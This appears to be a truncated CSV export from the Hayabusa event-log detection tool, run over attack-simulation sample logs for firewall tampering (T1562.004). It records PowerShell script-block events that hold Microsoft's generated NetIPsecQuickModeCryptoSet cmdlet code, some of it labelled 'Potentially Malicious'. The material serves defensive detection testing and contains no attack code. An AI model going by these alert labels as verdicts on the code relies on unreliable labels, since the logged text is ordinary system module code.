[ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, 
[Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIKEQMCryptoSet')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, 
[Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [Syst",rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:45.329 +00:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,"erSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true 
throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByDisplayGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null 
[object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewDisplayName')) { [object]$__cmdletization_value = ${NewDisplayName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Description')) { [object]$__cmdletization_value = ${Description} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Proposal')) { [object]$__cmdletization_value = ${Proposal} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Proposals'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = 
[Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Proposals'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PerfectForwardSecrecyGroup')) { [object]$__cmdletization_value = ${PerfectForwardSecrecyGroup} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PfsGroupID'; ParameterType = 'Microsoft.Windows.Firewall.Commands.DiffieHellmanGroup'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PfsGroupID'; ParameterType = 'Microsoft.Windows.Firewall.Commands.DiffieHellmanGroup'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not 
$__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecQuickModeCryptoSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Set-NetIPsecQuickModeCryptoSet' -Alias '*' function Remove-NetIPsecQuickModeCryptoSet { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEQMCryptoSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [Alias('PfsGroup')] [ValidateNotNull()] [Microsoft.Windows.Firewall.Commands.DiffieHellmanGroup[]] ${PerfectForwardSecrecyGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] 
[PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIKEQMCryptoSet')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] 
[Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [Syst",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:45.329 +00:00,srvdefender01.offsec.lan,4104,medium,,Potentially Malicious PwSh,"em.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) 
$__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PerfectForwardSecrecyGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PerfectForwardSecrecyGroup}) $__cmdletization_queryBuilder.FilterByProperty('PfsGroupID', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if 
($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleQMCryptoSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 
'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:DeleteInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecQuickModeCryptoSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Remove-NetIPsecQuickModeCryptoSet' -Alias '*' function Rename-NetIPsecQuickModeCryptoSet { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEQMCryptoSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] 
[string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [Alias('PfsGroup')] [ValidateNotNull()] [Microsoft.Windows.Firewall.Commands.DiffieHellmanGroup[]] ${PerfectForwardSecrecyGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIKEQMCryptoSet')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, 
[Parameter(ParameterSetName='ByName', Mandatory=$true)] [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [Parameter(ParameterSetName='ByQuery', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true)] [Parameter(ParameterSetName='GetAll', Mandatory=$true)] [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true)] [string] ${NewName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is 
[System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdleti",rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:45.329 +00:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,"em.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = 
@(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PerfectForwardSecrecyGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PerfectForwardSecrecyGroup}) $__cmdletization_queryBuilder.FilterByProperty('PfsGroupID', $__cmdletization_values, $false, 'Default') } if 